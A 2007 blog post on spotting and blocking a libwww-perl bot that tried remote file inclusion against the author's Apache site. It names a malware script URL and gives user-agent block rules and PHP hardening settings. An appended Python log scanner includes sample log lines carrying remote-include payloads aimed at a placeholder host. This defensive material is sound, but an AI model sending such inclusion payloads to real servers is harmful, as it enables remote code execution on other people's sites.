libwww-perl/5.805 User agent (bot) visited my website
Weird User-Agent bot seen while going through my Apache website logs: libwww-perl/5.805
One day, while monitoring my Apache logs, I started to see many lines looking like the one in the table below. The exact output of the logs (including the user agent, the requested URL and the IP address) is:
So the user from IP address 71.172.97.52 thought that requesting this URL from my server would tell it to download the script at http://malware.t35.com/safe.txt? and run it.
I took a look at the script that this libwww-perl bot was trying to get my server to run, and here it is:
Then I searched a little on Google, and it seems that this user agent belongs to a well-known Perl library and set of Perl modules (libwww-perl, which also includes lwp-request, a simple command-line user agent). It could be just about anything: a homemade bot, a custom browser or somebody running a script. It's a very generic tool. But judging by this request, it's for sure somebody running a script.
It can be blocked very well with the Apache mod_setenvif module by adding the following lines to your .htaccess or httpd.conf file:
SetEnvIfNoCase User-Agent libwww-perl bad_bots
order deny,allow
deny from env=bad_bots
or
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot=1
SetEnvIfNoCase User-Agent "psycheclone" bad_bot=1
#
# Allow universal access to robots.txt
# (pattern anchored so that only /robots.txt itself is exempted from the block)
SetEnvIf Request_URI "^/robots\.txt$" allow_all=1
#
Order Deny,Allow
Allow from env=allow_all
Deny from env=bad_bot
The above lines set the environment variable bad_bot to 1 for every visitor whose User-Agent contains libwww-perl or psycheclone (and block them), and the environment variable allow_all to 1 for every request for the robots.txt file (and allow them). They should be added to the .htaccess file in your website's DocumentRoot, to httpd.conf, or to bad_bots.conf (which must be included in httpd.conf with an Include /path/to/bad_bots_file.conf line).
Besides this, you have to make sure that the following two variables are set to Off in /usr/local/etc/php.ini (under FreeBSD) or /usr/local/apache/php/php.ini (under Linux):
register_globals = Off
allow_url_fopen = Off
The first line disables the use of register_globals:
When on, register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn't require variable initialization means writing insecure code is that much easier. It was a difficult decision, but the PHP community decided to disable this directive by default. When on, people use variables yet really don't know for sure where they come from and can only assume.
The second line disables opening/including files from remote URLs:
If enabled, allow_url_fopen allows PHP's file functions -- such as file_get_contents() and the include and require statements -- to retrieve data from remote locations, like an FTP or web site. Programmers frequently forget this and don't do proper input filtering when passing user-provided data to these functions, opening them up to code injection vulnerabilities. A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering.
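The User-Agent block above only stops clients that announce themselves as libwww-perl, so it also helps to search the access log for any request whose parameter value is a remote URL, whatever the agent says. The following is an added example, not code from the original post; it assumes Apache's "combined" log format, and the sample lines, IP addresses, host name and the parameter name "page" are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
SCRIPTED_UA = re.compile(r'libwww-perl', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, placeholder host and parameter name).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2007:10:01:02 +0200] "GET /index.php?page=http://example.invalid/safe.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [12/Mar/2007:10:02:10 +0200] "GET /index.php?page=http%3A%2F%2Fexample.invalid%2Fsafe.txt%3F HTTP/1.0" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Mar/2007:10:03:00 +0200] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux) Firefox/2.0"',
    '198.51.100.5 - - [12/Mar/2007:10:04:30 +0200] "GET /robots.txt HTTP/1.1" 200 68 "-" "libwww-perl/5.805"',
]


def inspect(line):
    """Return a finding dict for a suspicious log line, or None if it looks normal."""
    m = COMBINED.match(line)
    if not m:
        return None  # not a combined-format line
    query = m['target'].partition('?')[2]
    # parse_qsl percent-decodes values, so an encoded http%3A%2F%2F... is caught too.
    remote = [(name, value)
              for name, value in parse_qsl(query, keep_blank_values=True)
              if REMOTE_URL.match(value)]
    scripted = bool(SCRIPTED_UA.search(m['ua']))
    if not remote and not scripted:
        return None
    return {'ip': m['ip'], 'status': int(m['status']),
            'scripted_ua': scripted, 'remote_params': remote}


def scan(lines):
    """Collect findings for every suspicious line in an iterable of log lines."""
    return [finding for finding in map(inspect, lines) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Lines with remote_params and a 200 status are the ones to review first, since a 403 there means the server already refused the request.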
Copyright 2007 Andrei Manescu